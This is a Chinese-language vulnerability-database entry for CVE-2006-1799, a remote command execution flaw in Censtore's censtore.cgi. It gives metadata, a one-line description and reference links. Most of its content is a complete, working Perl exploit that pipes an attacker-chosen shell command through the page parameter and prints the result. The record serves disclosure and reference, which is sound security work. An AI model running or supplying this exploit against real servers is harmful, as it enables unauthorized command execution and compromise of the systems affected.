Censtore censtore.cgi 远程任意命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110064 漏洞类型 输入验证
发布时间 2006-04-13 更新时间 2006-04-18
CVE编号 CVE-2006-1799 CNNVD-ID CNNVD-200604-276
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1669
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-276
|漏洞详情
Censtore7.3.002及早期版本中的censtore.cgi允许远程攻击者借助于页面参数中的shell元字符执行任意命令。
|漏洞EXP
#!/usr/bin/perl
#
#  Censtore.cgi exploit by FOX_MULDER (fox_mulder@abv.bg)
#
#  Vulnerability foud by FOX_MULDER.
#
#  This is the first exploit i release and the bug is not public so enjoy.
#  Ask http://censtore.com/ what they think about it !!!  
#
###########################

use IO::Socket;
use LWP::Simple; 

sub Usage {
print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n";
print STDERR "Usage:\ncenex.pl <www.example.com> </path/> \"cmd\"\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "\n\n !!! ULTRA PRIVATE EDITION !!! \n\n";
print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER\n";

print "\n[+] Conecting to $host\n";

my $result = get("http://$host$path/censtore.cgi?page=|$command|"); 

if (defined $result) { 
print $result; 
} 
else { 
print "Error with request.\n"; 
}

# milw0rm.com [2006-04-13]
|参考资料

来源:BID
名称:17515
链接:http://www.securityfocus.com/bid/17515
来源:MILW0RM
名称:1669
链接:http://www.milw0rm.com/exploits/1669
来源:VUPEN
名称:ADV-2006-1352
链接:http://www.frsirt.com/english/advisories/2006/1352
来源:SECUNIA
名称:19666
链接:http://secunia.com/advisories/19666
来源:XF
名称:censtore-page-command-execution(25905)
链接:http://xforce.iss.net/xforce/xfdb/25905
来源:MILW0RM
名称:1669
链接:http://milw0rm.com/exploits/1669